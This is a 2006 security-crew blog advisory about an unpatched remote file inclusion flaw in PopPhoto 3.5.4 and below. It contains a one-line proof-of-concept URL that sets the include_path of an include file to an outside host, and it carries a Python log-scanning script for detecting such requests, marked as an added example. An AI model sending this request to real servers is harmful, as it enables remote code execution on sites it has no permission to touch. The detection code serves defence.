by r0t,der4444,cembo,VietMafia

Sunday, May 14, 2006

PopPhoto - Remote File Inclusion Vuln


=================================
script: PopPhoto 3.5.4 and below
risk: critical
status: unpatched
discovered by: VietMafia
=================================

Vuln. Description:

This flaw is due to an input validation error in "resources/includes/popp.config.loader.inc.php" (line 25), which does not properly validate the "cfg['popphoto_base_path']" variable. Remote attackers can include malicious scripts and execute arbitrary commands with the privileges of the web server.

PoC:

http://[target]/[path]/resources/includes/popp.config.loader.inc.php?
include_path=http://unsecured-systems.com/forum/

Sorry all, I'm still travelling so I don't have much time to contribute :) I will be back very soon.
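Added example, not part of the original advisory: a log check a defender can run to find requests that call an include file directly and pass a remote URL as a parameter, which is the request shape described above. The log lines, the host remote.example and the function names are constructed for illustration; the two parameter names are the ones that appear in this post.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample access-log lines; client addresses, hosts and paths are made up.
SAMPLE_LOG = [
    '198.51.100.7 - - [14/May/2006:10:01:02 +0000] "GET /gallery/index.php?page=2 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [14/May/2006:10:01:05 +0000] "GET /gallery/resources/includes/popp.config.loader.inc.php?include_path=http://remote.example/x/ HTTP/1.1" 200 312',
    '203.0.113.9 - - [14/May/2006:10:01:09 +0000] "GET /gallery/resources/includes/popp.config.loader.inc.php?cfg[popphoto_base_path]=http%3A%2F%2Fremote.example%2Fx%2F HTTP/1.1" 200 312',
    '203.0.113.9 - - [14/May/2006:10:01:12 +0000] "GET /gallery/resources/includes/popp.config.loader.inc.php?cfg%5Bpopphoto_base_path%5D=hTTp%253A%252F%252Fremote.example%252F HTTP/1.1" 200 0',
    '198.51.100.7 - - [14/May/2006:10:02:00 +0000] "GET /gallery/view.php?ref=http://www.example.org/ HTTP/1.1" 200 900',
]

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
INCLUDE_FILE_RE = re.compile(r'(?:/includes?/|\.inc\.php$)')  # files meant to be included, not requested
REMOTE_URL_RE = re.compile(r'^\s*(?:https?|ftp)://', re.I)


def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded values are also caught."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_rfi_attempts(lines):
    """Return (client_ip, script_path, parameter_name) for each suspicious request."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line in the expected format
        client, target = m.groups()
        url = urlsplit(target)
        path = fully_decode(url.path).lower()
        if not INCLUDE_FILE_RE.search(path):
            continue  # only directly requested include files are of interest here
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            if REMOTE_URL_RE.match(fully_decode(value)):
                hits.append((client, path, fully_decode(name)))
    return hits


if __name__ == "__main__":
    for hit in find_rfi_attempts(SAMPLE_LOG):
        print(hit)
```

A hit shows that the request was made, not that the include succeeded.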

3 Comments:

Blogger r0t told...

No probz bro, I'm also still enjoying my holidays...

4:32 AM

 
Anonymous alfanso told...

PoC isn't working..........:O

8:56 AM

 
Blogger VietMafia told...

lol, you have to use the PoC wisely mate

4:02 PM

 


 
Copyright (c) 2006 Pridels Sec Crew